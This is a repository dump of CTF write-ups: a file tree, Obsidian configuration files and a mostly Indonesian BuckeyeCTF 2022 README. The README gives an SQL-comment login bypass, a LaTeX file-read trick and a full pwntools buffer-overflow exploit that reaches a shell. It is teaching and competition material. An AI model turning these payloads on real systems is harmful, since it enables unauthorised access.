├── 2022
├── BuckeyeCTF 2022
│ ├── Pasted image 20221107060238.png
│ ├── Pasted image 20221107060336.png
│ ├── Pasted image 20221107060408.png
│ ├── Pasted image 20221107060436.png
│ ├── Pasted image 20221107060452.png
│ ├── Pasted image 20221107060800.png
│ └── README.md
├── CJCTF 2022 Final
│ ├── Pasted image 20221222211919.png
│ ├── Pasted image 20221222211921.png
│ ├── Pasted image 20221222211953.png
│ ├── Pasted image 20221222212013.png
│ ├── Pasted image 20221222212045.png
│ ├── Pasted image 20221222212131.png
│ ├── Pasted image 20221222212154.png
│ ├── Pasted image 20221222212232.png
│ ├── Pasted image 20221222212243.png
│ ├── Pasted image 20221222212315.png
│ ├── Pasted image 20221222214414.png
│ ├── Pasted image 20221222214636.png
│ ├── Pasted image 20221222215806.png
│ └── README.md
├── CJCTF 2022 Quals
│ └── TCP1P_CJ2022.pdf
├── Compfest14-quals
│ └── COMPFEST14_TCP1P.pdf
├── Cyber Apocalypse CTF 2022 - Intergalactic Chase
│ └── README.md
├── Cyberwariors-Hackathon-Quals
│ ├── CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf
│ └── READMME.md
├── DiceCTF
│ ├── crypto
│ │ ├── kfb
│ │ │ ├── flag.txt
│ │ │ ├── server.py
│ │ │ └── solve.py
│ │ ├── obp
│ │ │ ├── obp.output.txt
│ │ │ └── solve.py
│ │ └── pem
│ │ │ ├── encrypted.bin
│ │ │ ├── flag.txt
│ │ │ ├── generate.py
│ │ │ ├── privatekey.pem
│ │ │ └── solve.py
│ ├── rev
│ │ ├── check
│ │ │ ├── .gdb_history
│ │ │ ├── challenge
│ │ │ └── solve.py
│ │ ├── slices
│ │ │ └── solve.py
│ │ └── super anti scalper solution
│ │ │ └── solve.html
│ └── web
│ │ ├── inspect-me
│ │ ├── README.md
│ │ └── inspect-me.mc.ax.html
│ │ ├── pastebin
│ │ └── README.md
│ │ ├── point
│ │ ├── point.ipynb
│ │ ├── point.main.go
│ │ └── solve.py
│ │ └── reverser
│ │ ├── reverser.app.py
│ │ └── solve.py
├── DownUnderCTF 2022
│ ├── Pasted image 20220925192012.png
│ ├── Pasted image 20220925192200.png
│ ├── Pasted image 20220925192221.png
│ ├── Pasted image 20220925192245.png
│ ├── Pasted image 20220925192305.png
│ ├── Pasted image 20220925192349.png
│ ├── Pasted image 20220925192359.png
│ ├── Pasted image 20220925192410.png
│ ├── Pasted image 20220925192451.png
│ ├── Pasted image 20220925192503.png
│ ├── Pasted image 20220925192528.png
│ ├── Pasted image 20220925192546.png
│ ├── Pasted image 20220925192621.png
│ ├── Pasted image 20220925192703.png
│ ├── Pasted image 20220925192712.png
│ ├── Pasted image 20220925192904.png
│ ├── Pasted image 20220925192923.png
│ ├── Pasted image 20220925193009.png
│ ├── Pasted image 20220925193231.png
│ ├── Pasted image 20220925193444.png
│ ├── Pasted image 20220925193527.png
│ └── README.md
├── GoolgeCTF2022
│ └── README.md
├── MapleCTF 2022
│ ├── crypto
│ │ └── brsaby
│ │ │ ├── script.py
│ │ │ └── solve.ipynb
│ ├── pwn
│ │ ├── README.md
│ │ ├── terminal.png
│ │ └── warmup1
│ │ │ ├── chal
│ │ │ ├── flag.txt
│ │ │ └── solve.py
│ └── web
│ │ ├── Bookstore
│ │ ├── Solve.py
│ │ └── bookstore.zip
│ │ ├── Pickle Factory
│ │ ├── pickle-factory.zip
│ │ └── solve.py
│ │ └── honksay
│ │ ├── a.out
│ │ ├── honksay.tar.gz
│ │ ├── hosted
│ │ ├── ._Dockerfile
│ │ ├── ._app.js
│ │ ├── ._goose.js
│ │ ├── ._package-lock.json
│ │ ├── ._package.json
│ │ ├── ._public
│ │ ├── Dockerfile
│ │ ├── app.js
│ │ ├── build.sh
│ │ ├── goose.js
│ │ ├── package-lock.json
│ │ ├── package.json
│ │ └── public
│ │ │ ├── ._images
│ │ │ └── images
│ │ │ ├── ._goosevie.png
│ │ │ └── goosevie.png
│ │ └── solve.md
├── NCW2022
│ └── WU_NCW22_Anya Haha Inakute Sabishii.pdf
├── SECCON CTF 2022 Quals
│ ├── Pasted image 20221113195707.png
│ ├── Pasted image 20221113195729.png
│ ├── Pasted image 20221113195754.png
│ └── README.md
├── TCP1P-CTF-Bootcamp
│ └── PWN
│ │ ├── Pasted image 20221231091251.png
│ │ └── README.md
├── annofest-2022
│ └── Penyisihan
│ │ └── README.md
├── corCTF 2022
│ ├── babypwn
│ │ ├── babypwn
│ │ ├── get_libc.py
│ │ ├── main
│ │ │ ├── Dockerfile
│ │ │ ├── babypwn
│ │ │ ├── flag.txt
│ │ │ ├── libc.so.6
│ │ │ └── run.sh
│ │ └── solve.py
│ └── whack-a-frog
│ │ ├── solve.py
│ │ ├── test
│ │ └── whacking-the-froggers.pcap
├── csawctf-qual-2022
│ ├── Pasted image 20220912170611.png
│ ├── Pasted image 20220912170634.png
│ ├── Pasted image 20220912170647.png
│ ├── Pasted image 20220912170726.png
│ ├── Pasted image 20220912170742.png
│ ├── Pasted image 20220912171239.png
│ ├── Pasted image 20220912171311.png
│ └── README.md
├── ctf.nullcon.net
│ ├── Cloud 9*9
│ │ ├── README.md
│ │ ├── access.py
│ │ ├── flag4.txt
│ │ ├── rce.py
│ │ └── set.env.sh
│ ├── Git To the Core
│ │ ├── README.md
│ │ ├── connect.py
│ │ └── task.py
│ ├── Unis Love Code
│ │ ├── chall.py
│ │ └── test.py
│ └── jsonify
│ │ ├── flag.txt
│ │ ├── index.php
│ │ ├── test.php
│ │ └── test2.php
├── ctf.thefewchosen.com
│ └── README.md
├── deadface-ctf
│ ├── Pasted image 20221016084856.png
│ ├── Pasted image 20221016084906.png
│ ├── Pasted image 20221016084928.png
│ ├── Pasted image 20221016085136.png
│ ├── Pasted image 20221016085148.png
│ ├── Pasted image 20221016085202.png
│ ├── Pasted image 20221016085210.png
│ ├── Pasted image 20221016085502.png
│ ├── Pasted image 20221016085646.png
│ ├── Pasted image 20221016090134.png
│ ├── Pasted image 20221016090147.png
│ ├── Pasted image 20221016090154.png
│ ├── Pasted image 20221016090238.png
│ ├── Pasted image 20221016090243.png
│ ├── Pasted image 20221016090323.png
│ └── README.md
├── gdg-algiers-ctf
│ ├── Pasted image 20221010110356.png
│ ├── Pasted image 20221010110402.png
│ ├── Pasted image 20221010110408.png
│ ├── Pasted image 20221010110505.png
│ ├── Pasted image 20221010110510.png
│ ├── Pasted image 20221010110604.png
│ ├── Pasted image 20221010110608.png
│ ├── Pasted image 20221010110728.png
│ ├── Pasted image 20221010111105.png
│ └── README.md
├── glacierctf-2022
│ ├── Pasted image 20221127092045.png
│ ├── Pasted image 20221127092101.png
│ ├── Pasted image 20221127092221.png
│ ├── Pasted image 20221127092240.png
│ ├── Pasted image 20221127092353.png
│ ├── Pasted image 20221127093038.png
│ ├── Pasted image 20221127093304.png
│ ├── Pasted image 20221127093345.png
│ └── README.md
├── jade-ctf
│ ├── Pasted image 20221023144928.png
│ ├── Pasted image 20221023145014.png
│ ├── Pasted image 20221023145032.png
│ ├── Pasted image 20221023145105.png
│ ├── Pasted image 20221023153937.png
│ ├── Pasted image 20221023154016.png
│ ├── Pasted image 20221023154059.png
│ ├── Pasted image 20221023154120.png
│ ├── Pasted image 20221023154451.png
│ ├── Pasted image 20221023154508.png
│ ├── Pasted image 20221023154544.png
│ ├── Pasted image 20221023154728.png
│ ├── Pasted image 20221023154928.png
│ ├── Pasted image 20221023154942.png
│ ├── Pasted image 20221023155120.png
│ ├── Pasted image 20221023155211.png
│ ├── Pasted image 20221023155218.png
│ └── README.md
├── kitctfctf-2022
│ ├── Pasted image 20221211192759.png
│ ├── Pasted image 20221211192912.png
│ ├── Pasted image 20221211192926.png
│ ├── Pasted image 20221211192941.png
│ ├── Pasted image 20221211192953.png
│ ├── Pasted image 20221211193146.png
│ ├── Pasted image 20221211193234.png
│ └── README.md
├── sekai-ctf
│ ├── Pasted image 20221004173301.png
│ ├── Pasted image 20221004173340.png
│ └── README.md
├── square-ctf-2022
│ ├── Pasted image 20221121074934.png
│ ├── Pasted image 20221121074939.png
│ ├── Pasted image 20221121075018.png
│ ├── Pasted image 20221121075102.png
│ └── README.md
├── tangerang CTF
│ ├── Pasted image 20220319104150.png
│ ├── Pasted image 20220319174935.png
│ ├── Pasted image 20220319174951.png
│ ├── Pasted image 20220319180942.png
│ ├── Pasted image 20220319194044.png
│ ├── Pasted image 20220319194544.png
│ ├── Pasted image 20220320063212.png
│ ├── Pasted image 20220320065410.png
│ ├── Pasted image 20220320102408.png
│ ├── Pasted image 20220320103533.png
│ └── README.md
├── web1.hsctf.com
│ └── README.md
└── x-mas-ctf-2022
│ ├── Pasted image 20221222205054.png
│ ├── Pasted image 20221222205402.png
│ ├── Pasted image 20221222205507.png
│ ├── Pasted image 20221222205718.png
│ ├── Pasted image 20221222205819.png
│ ├── Pasted image 20221222205926.png
│ ├── Pasted image 20221222210046.png
│ ├── Pasted image 20221222210140.png
│ ├── Pasted image 20221222210201.png
│ ├── Pasted image 20221222210316.png
│ ├── Pasted image 20221222210324.png
│ ├── Pasted image 20221223211635.png
│ ├── Pasted image 20221223211710.png
│ ├── Pasted image 20221223211742.png
│ ├── Pasted image 20221223211801.png
│ ├── Pasted image 20221223212147.png
│ ├── Pasted image 20221223212155.png
│ └── README.md
├── 2023
├── 0xL4ughCTF 2023
│ └── README.md
├── ARACTF2023
│ └── README.md
├── BucketCtf 2023
│ └── README.md
├── ByuCtf-2023
│ └── README.md
├── Cursedctf-2023
│ └── README.md
├── DiceCTF-2023
│ ├── Pasted image 20230207164229.png
│ ├── Pasted image 20230207164413.png
│ ├── Pasted image 20230207164435.png
│ └── README.md
├── HTB Cyber Apocalypse 2023
│ ├── Pasted image 20230324115213.png
│ └── README.md
├── HackTMCTF-quals
│ └── README.md
├── IdekCTF-2022
│ ├── Pasted image 20230116231049.png
│ ├── Pasted image 20230116231114.png
│ ├── Pasted image 20230116231338.png
│ └── README.md
├── Joints Quals 2023
│ └── README.md
├── KalmarCTF-2023
│ └── README.md
├── Knightctf-2023
│ ├── Pasted image 20230122064030.png
│ ├── Pasted image 20230122064152.png
│ ├── Pasted image 20230122064305.png
│ ├── Pasted image 20230122064318.png
│ ├── Pasted image 20230122064420.png
│ ├── Pasted image 20230122064435.png
│ ├── Pasted image 20230122064452.png
│ ├── Pasted image 20230122064534.png
│ ├── Pasted image 20230122064618.png
│ ├── Pasted image 20230122064721.png
│ ├── Pasted image 20230122064755.png
│ ├── Pasted image 20230122064820.png
│ ├── Pasted image 20230122064919.png
│ └── README.md
├── LACTF-2023
│ ├── Pasted image 20230214115929.png
│ └── README.md
├── LineCTF 2023
│ └── README.md
├── Pragyan CTF 2023
│ └── README.md
├── Real-World-CTF
│ ├── Pasted image 20230109172555.png
│ └── README.md
├── RushCTF 2023
│ └── README.md
├── San-diego-ctf-2023
│ └── README.md
├── UMASSCTF 2023
│ └── README.md
├── UTCTF 2023
│ └── README.md
├── VU-Cyberthon-2023
│ └── README.md
├── WaniCtf 2023
│ └── README.md
├── Wrectit Quals 2023
│ └── README.md
├── angstromctf-2023
│ └── README.md
├── bbctf-2023
│ ├── Pasted image 20230206061956.png
│ ├── Pasted image 20230206062058.png
│ ├── Pasted image 20230206062127.png
│ ├── Pasted image 20230206062218.png
│ └── README.md
├── ctf-after-dark-winter-2023
│ └── README.md
├── damctf-2023
│ └── README.md
├── deadsec-ctf-2023
│ └── README.md
├── gray-cat-the-flag-2023-qualifier
│ └── README.md
├── hackpack-ctf-2023
│ └── README.md
├── m0leConCTF-2023
│ └── README.md
├── nullcon HackIM CTF Berlin
│ └── README.md
├── plaidCTF 2023
│ └── README.md
├── umdctf-2023
│ └── README.md
└── wolvctf-2023
│ ├── Pasted image 20230323041112.png
│ ├── Pasted image 20230323041128.png
│ └── README.md
├── .obsidian
├── app.json
├── appearance.json
├── community-plugins.json
├── core-plugins-migration.json
├── core-plugins.json
├── graph.json
├── hotkeys.json
├── plugins
│ ├── obsidian-dynamic-toc
│ │ ├── main.js
│ │ ├── manifest.json
│ │ └── styles.css
│ ├── obsidian-git
│ │ ├── data.json
│ │ ├── main.js
│ │ ├── manifest.json
│ │ └── styles.css
│ └── obsidian-imgur-plugin
│ │ ├── data.json
│ │ ├── main.js
│ │ └── manifest.json
└── workspace.json
└── README.md
/.obsidian/app.json:
--------------------------------------------------------------------------------
1 | {
2 | "attachmentFolderPath": "./",
3 | "newLinkFormat": "relative",
4 | "useMarkdownLinks": true,
5 | "pdfExportSettings": {
6 | "pageSize": "Letter",
7 | "landscape": false,
8 | "margin": "0",
9 | "downscalePercent": 100
10 | }
11 | }
--------------------------------------------------------------------------------
/.obsidian/appearance.json:
--------------------------------------------------------------------------------
1 | {
2 | "accentColor": "",
3 | "baseFontSize": 15
4 | }
--------------------------------------------------------------------------------
/.obsidian/community-plugins.json:
--------------------------------------------------------------------------------
1 | [
2 | "obsidian-dynamic-toc",
3 | "obsidian-git",
4 | "obsidian-imgur-plugin"
5 | ]
--------------------------------------------------------------------------------
/.obsidian/core-plugins-migration.json:
--------------------------------------------------------------------------------
1 | {
2 | "file-explorer": true,
3 | "global-search": true,
4 | "switcher": true,
5 | "graph": true,
6 | "backlink": true,
7 | "outgoing-link": true,
8 | "tag-pane": true,
9 | "page-preview": true,
10 | "daily-notes": true,
11 | "templates": true,
12 | "note-composer": true,
13 | "command-palette": true,
14 | "slash-command": false,
15 | "editor-status": true,
16 | "starred": true,
17 | "markdown-importer": false,
18 | "zk-prefixer": false,
19 | "random-note": false,
20 | "outline": true,
21 | "word-count": true,
22 | "slides": false,
23 | "audio-recorder": false,
24 | "workspaces": false,
25 | "file-recovery": true,
26 | "publish": false,
27 | "sync": false,
28 | "canvas": true,
29 | "bookmarks": true
30 | }
--------------------------------------------------------------------------------
/.obsidian/core-plugins.json:
--------------------------------------------------------------------------------
1 | [
2 | "file-explorer",
3 | "global-search",
4 | "switcher",
5 | "graph",
6 | "backlink",
7 | "canvas",
8 | "outgoing-link",
9 | "tag-pane",
10 | "page-preview",
11 | "daily-notes",
12 | "templates",
13 | "note-composer",
14 | "command-palette",
15 | "editor-status",
16 | "bookmarks",
17 | "outline",
18 | "word-count",
19 | "file-recovery"
20 | ]
--------------------------------------------------------------------------------
/.obsidian/graph.json:
--------------------------------------------------------------------------------
1 | {
2 | "collapse-filter": true,
3 | "search": "",
4 | "showTags": false,
5 | "showAttachments": false,
6 | "hideUnresolved": false,
7 | "showOrphans": true,
8 | "collapse-color-groups": true,
9 | "colorGroups": [],
10 | "collapse-display": true,
11 | "showArrow": false,
12 | "textFadeMultiplier": 0,
13 | "nodeSizeMultiplier": 1,
14 | "lineSizeMultiplier": 1,
15 | "collapse-forces": true,
16 | "centerStrength": 0.518713248970312,
17 | "repelStrength": 10,
18 | "linkStrength": 1,
19 | "linkDistance": 250,
20 | "scale": 0.6283605869744029,
21 | "close": false
22 | }
--------------------------------------------------------------------------------
/.obsidian/hotkeys.json:
--------------------------------------------------------------------------------
1 | {
2 | "obsidian-dynamic-toc:dynamic-toc-insert-command": [
3 | {
4 | "modifiers": [
5 | "Mod"
6 | ],
7 | "key": "."
8 | }
9 | ],
10 | "obsidian-plugin-toc:create-toc-next-level": [],
11 | "obsidian-plugin-toc:create-toc": [
12 | {
13 | "modifiers": [
14 | "Mod"
15 | ],
16 | "key": "."
17 | }
18 | ]
19 | }
--------------------------------------------------------------------------------
/.obsidian/plugins/obsidian-dynamic-toc/manifest.json:
--------------------------------------------------------------------------------
1 | {
2 | "id": "obsidian-dynamic-toc",
3 | "name": "Dynamic Table of Contents",
4 | "author": "aidurber",
5 | "description": "An Obsidian plugin to generate Tables of Contents that stay up to date with your document outline.",
6 | "minAppVersion": "0.11.0",
7 | "version": "0.0.27",
8 | "repo": "aidurber/obsidian-plugin-dynamic-toc"
9 | }
10 |
--------------------------------------------------------------------------------
/.obsidian/plugins/obsidian-dynamic-toc/styles.css:
--------------------------------------------------------------------------------
1 | .is-live-preview .dynamic-toc>*{margin-top:0;margin-bottom:0}.is-live-preview .dynamic-toc>* br{display:none}.is-live-preview .dynamic-toc>*:first-child{margin-top:16px}.is-live-preview .dynamic-toc>*:last-child{margin-bottom:16px}.is-live-preview .dynamic-toc ul{white-space:normal}.is-live-preview .dynamic-toc ol{white-space:normal}
2 |
--------------------------------------------------------------------------------
/.obsidian/plugins/obsidian-git/data.json:
--------------------------------------------------------------------------------
1 | {
2 | "commitMessage": "vault backup: {{date}}",
3 | "commitDateFormat": "YYYY-MM-DD HH:mm:ss",
4 | "autoSaveInterval": 0,
5 | "autoPushInterval": 0,
6 | "autoPullInterval": 0,
7 | "autoPullOnBoot": false,
8 | "disablePush": false,
9 | "pullBeforePush": true,
10 | "disablePopups": false,
11 | "listChangedFilesInMessageBody": false,
12 | "showStatusBar": true,
13 | "updateSubmodules": false,
14 | "syncMethod": "merge",
15 | "customMessageOnAutoBackup": false,
16 | "autoBackupAfterFileChange": false,
17 | "treeStructure": false,
18 | "refreshSourceControl": true,
19 | "basePath": "",
20 | "differentIntervalCommitAndPush": false,
21 | "changedFilesInStatusBar": false,
22 | "showedMobileNotice": true,
23 | "refreshSourceControlTimer": 7000,
24 | "showBranchStatusBar": true,
25 | "setLastSaveToLastCommit": false,
26 | "submoduleRecurseCheckout": false,
27 | "gitDir": "",
28 | "showFileMenu": true,
29 | "autoCommitMessage": "vault backup: {{date}}"
30 | }
--------------------------------------------------------------------------------
/.obsidian/plugins/obsidian-git/manifest.json:
--------------------------------------------------------------------------------
1 | {
2 | "id": "obsidian-git",
3 | "name": "Obsidian Git",
4 | "description": "Backup your vault with Git.",
5 | "isDesktopOnly": false,
6 | "fundingUrl": "https://ko-fi.com/vinzent",
7 | "js": "main.js",
8 | "version": "2.19.1"
9 | }
10 |
--------------------------------------------------------------------------------
/.obsidian/plugins/obsidian-imgur-plugin/data.json:
--------------------------------------------------------------------------------
1 | {
2 | "uploadStrategy": "ANONYMOUS_IMGUR",
3 | "clientId": null,
4 | "showRemoteUploadConfirmation": false
5 | }
--------------------------------------------------------------------------------
/.obsidian/plugins/obsidian-imgur-plugin/manifest.json:
--------------------------------------------------------------------------------
1 | {
2 | "id": "obsidian-imgur-plugin",
3 | "name": "Imgur Plugin",
4 | "version": "2.2.1",
5 | "minAppVersion": "0.13.19",
6 | "description": "This plugin uploads images from your clipboard to imgur.com and embeds uploaded image to your note",
7 | "author": "Kirill Gavrilov",
8 | "authorUrl": "https://github.com/gavvvr",
9 | "isDesktopOnly": true
10 | }
11 |
--------------------------------------------------------------------------------
/.obsidian/workspace.json:
--------------------------------------------------------------------------------
1 | {
2 | "main": {
3 | "id": "4c0409ed7591ba4c",
4 | "type": "split",
5 | "children": [
6 | {
7 | "id": "294506181e74d78a",
8 | "type": "tabs",
9 | "children": [
10 | {
11 | "id": "ea1298c9a2b7937d",
12 | "type": "leaf",
13 | "state": {
14 | "type": "markdown",
15 | "state": {
16 | "file": "2023/ByuCtf-2023/README.md",
17 | "mode": "source",
18 | "source": false
19 | }
20 | }
21 | },
22 | {
23 | "id": "825932db43b069b6",
24 | "type": "leaf",
25 | "state": {
26 | "type": "markdown",
27 | "state": {
28 | "file": "README.md",
29 | "mode": "source",
30 | "source": false
31 | }
32 | }
33 | }
34 | ]
35 | }
36 | ],
37 | "direction": "vertical"
38 | },
39 | "left": {
40 | "id": "4804650776430b5c",
41 | "type": "split",
42 | "children": [
43 | {
44 | "id": "0e2ea75063aedbc8",
45 | "type": "tabs",
46 | "children": [
47 | {
48 | "id": "dda2f2ac5d697884",
49 | "type": "leaf",
50 | "state": {
51 | "type": "file-explorer",
52 | "state": {
53 | "sortOrder": "alphabetical"
54 | }
55 | }
56 | },
57 | {
58 | "id": "cea1a1732bbd4758",
59 | "type": "leaf",
60 | "state": {
61 | "type": "search",
62 | "state": {
63 | "query": "",
64 | "matchingCase": false,
65 | "explainSearch": false,
66 | "collapseAll": false,
67 | "extraContext": false,
68 | "sortOrder": "alphabetical"
69 | }
70 | }
71 | },
72 | {
73 | "id": "09aefc050bc2aa5a",
74 | "type": "leaf",
75 | "state": {
76 | "type": "starred",
77 | "state": {}
78 | }
79 | },
80 | {
81 | "id": "4c3ed564f8b8a6db",
82 | "type": "leaf",
83 | "state": {
84 | "type": "bookmarks",
85 | "state": {}
86 | }
87 | }
88 | ]
89 | }
90 | ],
91 | "direction": "horizontal",
92 | "width": 300
93 | },
94 | "right": {
95 | "id": "6b6ce11dc9cf1f82",
96 | "type": "split",
97 | "children": [
98 | {
99 | "id": "c90deb156513a322",
100 | "type": "tabs",
101 | "children": [
102 | {
103 | "id": "8b420389797f3889",
104 | "type": "leaf",
105 | "state": {
106 | "type": "backlink",
107 | "state": {
108 | "file": "2023/ByuCtf-2023/README.md",
109 | "collapseAll": false,
110 | "extraContext": false,
111 | "sortOrder": "alphabetical",
112 | "showSearch": false,
113 | "searchQuery": "",
114 | "backlinkCollapsed": false,
115 | "unlinkedCollapsed": true
116 | }
117 | }
118 | },
119 | {
120 | "id": "427d1310fb19206a",
121 | "type": "leaf",
122 | "state": {
123 | "type": "outgoing-link",
124 | "state": {
125 | "file": "2023/ByuCtf-2023/README.md",
126 | "linksCollapsed": false,
127 | "unlinkedCollapsed": true
128 | }
129 | }
130 | },
131 | {
132 | "id": "6d3b8cc745d5a2cc",
133 | "type": "leaf",
134 | "state": {
135 | "type": "tag",
136 | "state": {
137 | "sortOrder": "frequency",
138 | "useHierarchy": true
139 | }
140 | }
141 | },
142 | {
143 | "id": "390839dfd0d0fbff",
144 | "type": "leaf",
145 | "state": {
146 | "type": "outline",
147 | "state": {
148 | "file": "2023/ByuCtf-2023/README.md"
149 | }
150 | }
151 | }
152 | ],
153 | "currentTab": 3
154 | }
155 | ],
156 | "direction": "horizontal",
157 | "width": 300
158 | },
159 | "left-ribbon": {
160 | "hiddenItems": {
161 | "switcher:Open quick switcher": false,
162 | "graph:Open graph view": false,
163 | "canvas:Create new canvas": false,
164 | "daily-notes:Open today's daily note": false,
165 | "templates:Insert template": false,
166 | "command-palette:Open command palette": false
167 | }
168 | },
169 | "active": "ea1298c9a2b7937d",
170 | "lastOpenFiles": [
171 | "2023/deadsec-ctf-2023/README.md",
172 | "2023/ByuCtf-2023/README.md",
173 | "2023/ByuCtf-2023",
174 | "2023/gray-cat-the-flag-2023-qualifier/README.md",
175 | "2023/Untitled.md",
176 | "2023/deadsec-ctf-2023",
177 | "README.md",
178 | "2023/gray-cat-the-flag-2023-qualifier",
179 | "2023/m0leConCTF-2023/README.md",
180 | "2023/angstromctf-2023/README.md",
181 | "2023/m0leConCTF-2023",
182 | "some.md",
183 | "2023/San-diego-ctf-2023/README.md",
184 | "2023/San-diego-ctf-2023",
185 | "2023/WaniCtf 2023/README.md",
186 | "2023/WaniCtf 2023",
187 | "2023/umdctf-2023/README.md",
188 | "2023/umdctf-2023",
189 | "2023/hackpack-ctf-2023/README.md",
190 | "().md",
191 | "tmp.md",
192 | "Untitled.canvas",
193 | "Untitled",
194 | "2023/angstromctf-2023",
195 | "2023/plaidCTF 2023/README.md",
196 | "2023/plaidCTF 2023",
197 | "2023/Joints Quals 2023/README.md",
198 | "2023/LineCTF 2023/README.md",
199 | "2023/Wrectit Quals 2023/README.md",
200 | "2023/damctf-2023/README.md",
201 | "2023/BucketCtf 2023/README.md",
202 | "2023/Cursedctf-2023/README.md",
203 | "2023/wolvctf-2023/README.md",
204 | "2023/HTB Cyber Apocalypse 2023/README.md",
205 | "2023/UMASSCTF 2023/README.md",
206 | "2023/UMASC.md",
207 | "2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png",
208 | "2023/nullcon HackIM CTF Berlin/README.md",
209 | "2023/wolvctf-2023/Pasted image 20230323041128.png",
210 | "2023/wolvctf-2023/Pasted image 20230323041112.png",
211 | "2023/bbctf-2023/Pasted image 20230206062127.png",
212 | "2023/bbctf-2023/Pasted image 20230206062215.png",
213 | "2023/bbctf-2023/Pasted image 20230206062218.png"
214 | ]
215 | }
--------------------------------------------------------------------------------
/2022/BuckeyeCTF 2022/Pasted image 20221107060238.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060238.png
--------------------------------------------------------------------------------
/2022/BuckeyeCTF 2022/Pasted image 20221107060336.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060336.png
--------------------------------------------------------------------------------
/2022/BuckeyeCTF 2022/Pasted image 20221107060408.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060408.png
--------------------------------------------------------------------------------
/2022/BuckeyeCTF 2022/Pasted image 20221107060436.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060436.png
--------------------------------------------------------------------------------
/2022/BuckeyeCTF 2022/Pasted image 20221107060452.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060452.png
--------------------------------------------------------------------------------
/2022/BuckeyeCTF 2022/Pasted image 20221107060800.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060800.png
--------------------------------------------------------------------------------
/2022/BuckeyeCTF 2022/README.md:
--------------------------------------------------------------------------------
1 | # web
2 | ---
3 | ## Scanbook
4 |
5 | pada website ini kita diberikan url website, dimana website ini merupakan sebuah web app, untuk menyimpan note dan menyimpan datanya menggunakan qrcode. Jadi kita hanya perlu menggenerate qrcode dengan angka 0, di cyberchef https://gchq.github.io/CyberChef/#recipe=Generate_QR_Code(%27PNG%27,5,2,%27Medium%27)&input=MA, dan upload ke website tersebut. Yay kita mendaptkan flagnya
6 |
7 | 
8 |
9 | ## buckeyenotes
10 |
11 | kita diberikan website yang vulnerable dengan sql injection, dan kita disuruh untuk mengambil note dari spesifik user
12 |
13 | 
14 |
15 | cukup kita bypass menggunakan "brutusB3stNut9999'--"
16 |
17 | bypass menggunakan comment pada sql
18 |
19 | ## textual
20 |
21 | diketahui flag ada di current directory server, karna app ini menggunakan latex dan di latex ada fungsi untuk menambah latex lain menggunakan fungsi `\include`, kita bisa memanfaatkannya untuk membaca flag di current directory.
22 |
23 | 
24 |
25 | ## pong
26 |
27 | Didalam challenge kita diberikan url yang menuju website yang berisi game ping pong didalamnya.
28 |
29 | 
30 |
31 | Dalam challenge ini tujuan kita adalah untuk mengalahkan lawan kita. Setelah melihat source code menggunakan developer tools, kita mengetahui bahwa proses game ini dilakukan pada client, sihingga kita bisa mengubah beberapa parameter dalam game.
32 | Untuk source code index, bisa kalian lihat disini: https://pastebin.com/vKbP48ZR
33 |
34 | Jadi untuk menyelesaikan challenge ini saya merubah parameter bvx menjadi 100, agar bola masuk ke gawang lawan, dan kita bisa memenangkan game ini.
35 |
36 | 
37 |
38 | kita continue dari breakpoint, dan boom, kita mendapatkan flagnya
39 |
40 | 
41 |
42 | # pwn
43 | ---
44 | ## Samurai
45 |
46 | Kita diberikan source code, dimana kita perlu mencocokkan variable outcome dengan hex 0x4774cc, untuk mendapatkan shell.
47 |
48 | ```c
49 | if(outcome == 0x4774cc) {
50 | char* finisher = malloc(8);
51 | scroll(txt[3]);
52 | fgets(finisher, 8, stdin);
53 | system(finisher);
54 | }
55 | ```
56 |
57 | exploit
58 |
59 | ```python
60 | from pwn import *
61 | import sys
62 | from Crypto.Util.number import long_to_bytes
63 |
64 | context.binary = exe = ELF(f"./samurai", checksec=False)
65 | context.terminal = "konsole -e".split()
66 | context.log_level = "INFO"
67 | context.bits = 64
68 | context.arch = "amd64"
69 |
70 |
71 | def init():
72 | if args.RMT:
73 | p = remote(sys.argv[1], sys.argv[2])
74 | else:
75 | p = process()
76 | return Exploit(p), p
77 |
78 |
79 | class Exploit:
80 | def __init__(self, p: process):
81 | self.p = p
82 |
83 | def debug(self, script=None):
84 | if not args.RMT:
85 | if script:
86 | attach(self.p, script)
87 | else:
88 | attach(self.p)
89 |
90 | def sendName(self, content):
91 | p = self.p
92 | p.sendline(content)
93 |
94 | def waitForName(self):
95 | p = self.p
96 | p.recvuntil(b"what was it again?")
97 |
98 | def main():
99 | x, p = init()
100 | """
101 | karna pada source code ada baris seperti dibawah ini:
102 |
103 | strcpy(response + strlen(response) - 1, ".\n");
104 |
105 | kita harus membuat null-byte di awal, agar address yang ingin kita rubah,
106 | tidak ter-overwrite dengan newline.
107 | """
108 | pay = b"\x00"+b"A"*29
109 | pay += b"\xcc\x74\x47\x00"
110 | pay +=b"A"*2
111 | x.sendName(pay)
112 | x.debug("break *main+203\nc")
113 | x.waitForName()
114 | """
115 |
116 | char* finisher = malloc(8);
117 |
118 | kita hanya bisa mengirim sebanyak 8 byte,
119 | jadi kita menggunakan asterisk "*" untuk membaca flagnya
120 | """
121 | p.sendline(b"cat f*")
122 | p.interactive()
123 |
124 | if __name__=="__main__":
125 | main()
126 | ```
127 |
128 |
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222211919.png:
